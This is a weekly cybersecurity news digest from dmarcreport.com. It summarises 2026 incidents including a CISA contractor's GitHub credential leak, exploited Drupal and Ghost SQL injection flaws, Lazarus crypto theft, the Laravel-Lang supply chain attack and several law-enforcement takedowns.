GovCloud Keys Exposed, Drupal Flaw Exploited, Lazarus Crypto Theft

The biggest stories from the past week, curated for the dmarcreport.com community

CISA Contractor Exposed AWS GovCloud Keys and Sensitive Government Credentials on Public GitHub

In what one security researcher described as the worst leak he had ever witnessed in his career, a CISA contractor inadvertently published a treasure trove of government secrets to a public GitHub repository.

The repository, named “Private-CISA” and maintained by contractor Nightwing, exposed AWS administrative credentials, access keys, tokens, plaintext usernames and passwords for internal CISA systems, and SSH keys. Security researchers confirmed the authenticity of the leak, with some credentials reportedly still functional.

On May 14, GitGuardian found the public repository, which had been live since November 13, 2025, and contained 844 MB of data — including plain-text passwords, AWS tokens, Entra ID SAML certificates, CI/CD build logs, Kubernetes manifests, and deployment workflow documentation.

The exposed archive also detailed how CISA builds and deploys software internally. Researchers confirmed that the CISA administrator had explicitly disabled the default GitHub setting that blocks users from publishing SSH keys or other secrets. CISA pulled the repository offline within 26 hours of being notified and said it was implementing additional safeguards.

Drupal SQL Injection Flaw CVE-2026-9082 Actively Exploited — 15,000+ Attacks Across 65 Countries

A critical vulnerability in Drupal Core is now under aggressive exploitation just days after patches were released. CVE-2026-9082 is an SQL injection vulnerability affecting all supported versions of Drupal Core, allowing privilege escalation and remote code execution via specially crafted requests sent through the database abstraction API. In an update on May 22, 2026, Drupal acknowledged that “exploit attempts are now being detected in the wild.” Imperva observed over 15,000 attack attempts targeting almost 6,000 individual sites across 65 countries.

Almost half of those attacks were aimed at gaming and financial services websites — sectors where credential theft and financial data access have immediate monetization paths. CISA added the flaw to its Known Exploited Vulnerabilities catalogue on May 22, giving federal agencies a tight remediation deadline. Drupal administrators are urged to upgrade to patched versions (10.4.10, 10.5.10, 10.6.9, 11.1.10, 11.2.12, or 11.3.10) immediately.

North Korea’s Lazarus Group Steals $577M in Crypto Using Fileless RemotePE Malware

North Korea’s Lazarus Group has surfaced with a dangerous new playbook targeting financial and cryptocurrency organizations worldwide.

The campaign centers on RemotePE, a fileless remote access trojan that runs entirely in memory, leaving little forensic residue for conventional tools to detect. Lazarus operators pose as trading firm employees on Telegram, then use fake versions of Calendly and Picktime to arrange meetings and make the lure feel like a routine professional exchange.

The Lazarus Group has already stolen about $577 million in cryptocurrency in the first four months of 2026, accounting for 76% of all crypto thefts worldwide despite just two major hacking incidents, according to blockchain analytics firm TRM Labs. Their record total stolen has now reached $6 billion since 2017 — funds that allegedly finance the country’s weapons and nuclear development programs.

The in-memory-only approach means standard endpoint detection tools cannot find disk artifacts, forcing organizations to invest in behavioral and in-memory forensics they may not yet have deployed.

NYC Health + Hospitals Confirms 1.8 Million Patients Hit in Major Biometric Data Breach

One of the largest healthcare breaches of 2026 was formally confirmed this week, with the scale and sensitivity of the stolen data raising serious alarms.

The New York City public healthcare system said hackers stole personal and medical data, and scans of biometrics — including fingerprints — in one of the largest recorded breaches of 2026. Hackers had access to its network from November 2025 until February 2026, with entry attributed to a breach at a third-party vendor. Exposed data includes patients’ health insurance plan and policy information, medical information such as diagnoses, medications, tests, and imagery, as well as billing, claims, and payment information. Social Security numbers, passports, driver’s licenses, and “precise geolocation data” were also compromised.

The healthcare system is offering 24 months of complimentary credit monitoring to all affected individuals. The breach underscores the critical need for healthcare organizations to vet third-party vendor security postures rigorously.

Ubiquiti Patches Five UniFi OS Vulnerabilities Including Three with Maximum CVSS Score of 10.0

Millions of businesses relying on Ubiquiti networking gear received an urgent security update this week.

The first flaw (CVE-2026-34908) enables attackers to make unauthorized changes to targeted systems through an improper access control weakness in UniFi OS, while the second (CVE-2026-34909) allows access to files on the underlying system by abusing a path traversal vulnerability. A third maximum-severity flaw (CVE-2026-34910) makes it possible to launch a command injection attack after gaining network access by exploiting an improper input validation vulnerability.

The three maximum-severity vulnerabilities are exploitable remotely without privileges, requiring no authentication or user interaction. Researchers estimate that nearly 100,000 UniFi OS endpoints are accessible online, creating a large attack surface. Ubiquiti has released patched firmware and urges all administrators to update immediately, particularly for internet-facing deployments.

INTERPOL Operation Ramz: 201 Arrested in Landmark MENA Cybercrime Crackdown

INTERPOL announced the results of the first coordinated cybercrime operation of its scale across the Middle East and North Africa region.

Operation Ramz, conducted between October 2025 and February 28, 2026, involved 13 MENA countries and aimed to investigate and disrupt malicious infrastructure, identify suspects, and prevent future losses. The operation resulted in 201 arrests, the identification of 382 additional suspects, the identification of 3,867 victims, and the seizure of 53 servers. Nearly 8,000 pieces of intelligence were disseminated across participating countries.

The operation also dismantled a phishing-as-a-service platform after Algerian authorities confiscated its server along with hard drives containing phishing software and scripts. Moroccan officials seized computers and smartphones containing banking data and phishing tools. Participating nations included Algeria, Bahrain, Egypt, Iraq, Jordan, Lebanon, Libya, Morocco, Oman, Palestine, Qatar, Tunisia, and the UAE.

Cybersecurity experts recommend implementing DMARC, DKIM, and SPF together to prevent email spoofing, strengthen domain authentication, and protect organizations from phishing attacks.

EvilTokens PhaaS Platform Bypasses MFA to Compromise Microsoft 365 Organizations at Scale

A phishing-as-a-service platform that bypasses multi-factor authentication entirely continued to make headlines this week with an update on its extraordinary reach.

EvilTokens went live in February 2026. Within five weeks, it had compromised more than 340 Microsoft 365 organizations across five countries. The platform is sold as a turnkey service via Telegram bots, offering ready-made phishing pages, Microsoft API automation, and AI-generated emails.

Unlike most phishing tools that mimic login pages, EvilTokens abuses the legitimate Microsoft device code authentication flow to quietly hand over full account access to attackers. In advanced cases, EvilTokens converts stolen tokens into a Primary Refresh Token, enabling silent sign-on across all Microsoft 365 applications with no password or MFA required.

DMARC relevance: Because EvilTokens delivers its lures via email impersonating SharePoint, DocuSign, and payroll services, strong DMARC enforcement is a critical first line of defense to prevent these spoofed messages from ever reaching inboxes.

Verizon 2026 Data Breach Investigations Report Reveals Vulnerabilities Exploited Faster Than Ever

The annual Verizon DBIR landed this week, and its findings paint a stark picture of the evolving threat landscape.

Attackers are increasingly exploiting organizations that fail to patch internet-facing systems quickly enough. The DBIR highlights that only 26% of critical vulnerabilities listed in the CISA Known Exploited Vulnerabilities catalogue were fully remediated during 2025, down from 38% the previous year. The most frequent causes of breaches continue to heavily involve the human element — including social engineering, phishing, and stolen credentials — as well as the exploitation of software vulnerabilities. Mobile devices are now a favored target, with attackers moving to mobile phishing as organizations get better at spotting traditional email-based lures.

The report also flagged AI-assisted attacks as a rapidly rising trend, warning that AI is being used to identify vulnerabilities faster than many security teams can respond.

Ghost CMS SQL Injection CVE-2026-26980 Exploited to Fuel Large-Scale ClickFix Attacks

Threat actors have weaponized a critical flaw in the Ghost content management system to compromise hundreds of websites and redirect visitors to malware distribution channels.

The campaign involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost’s Content API that allows an unauthenticated attacker to read arbitrary data from the database. The flaw allows an attacker to gain access to a site’s admin API key, granting them the ability to poison the site by injecting malicious JavaScript code.

The injected scripts then redirect site visitors to ClickFix lures — social engineering prompts that trick users into manually executing malicious PowerShell commands under the guise of “fixing” a browser issue. The flaw was patched in Ghost version 6.19.1 back in February 2026, but a large number of sites have not yet applied the update. Website administrators are urged to upgrade immediately.

Laravel-Lang Supply Chain Attack Delivers Credential-Stealing Framework via Composer Packages

Developers relying on popular PHP localization packages received an unpleasant surprise this week as a sophisticated supply chain attack was uncovered. Attackers targeted multiple PHP packages belonging to Laravel-Lang, abusing GitHub version tags to distribute malicious code through Composer packages. Affected packages include laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions. “The timing and pattern of the newly published tags point to a broader compromise of the Laravel-Lang organization’s release process, rather than a single malicious package version,” security firm Socket said.

The tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart, indicating automated mass tagging or republishing. More than 700 versions associated with these packages were identified. The malicious packages delivered a comprehensive credential-stealing framework capable of exfiltrating developer secrets, API keys, and cloud credentials.

YellowKey BitLocker Bypass Vulnerability CVE-2026-45585 Disclosed — Microsoft Rushes Mitigation

A newly disclosed zero-day capable of bypassing Windows BitLocker encryption attracted urgent attention from security teams this week.

Microsoft released a mitigation for a BitLocker bypass vulnerability named YellowKey, now tracked as CVE-2026-45585, carrying a CVSS score of 6.8. It has been described as a BitLocker security feature bypass. “Microsoft is aware of a security feature bypass vulnerability in Windows publicly referred to as ‘YellowKey,’” the company stated. Microsoft also addressed BlueHammer (CVE-2026-33825), a privilege escalation bug in Windows Defender. The researcher who discovered the flaw published exploit code for it after notifying Microsoft and growing frustrated with the response time.

BitLocker bypass vulnerabilities are particularly concerning for organizations relying on disk encryption as a primary data protection control for lost or stolen devices.

Roblox Account Hijacking Ring Dismantled — 610,000 Accounts Stolen, $225K in Illicit Profits

Law enforcement struck a blow against gaming-focused cybercrime this week, dismantling a sophisticated account-theft operation.

Ukrainian police dismantled a hacking ring responsible for hijacking and selling over 610,000 Roblox accounts. The Roblox account hijacking ring generated roughly $225,000 in illicit profits and demonstrates the growing monetization of gaming-related cybercrime.

The operation highlights that gaming platforms are increasingly attractive targets for cybercriminals, not only for in-game currency theft but as a gateway to credential stuffing attacks against other platforms where victims reuse passwords. Parents and young users of gaming platforms are urged to enable two-factor authentication and use unique passwords for every account.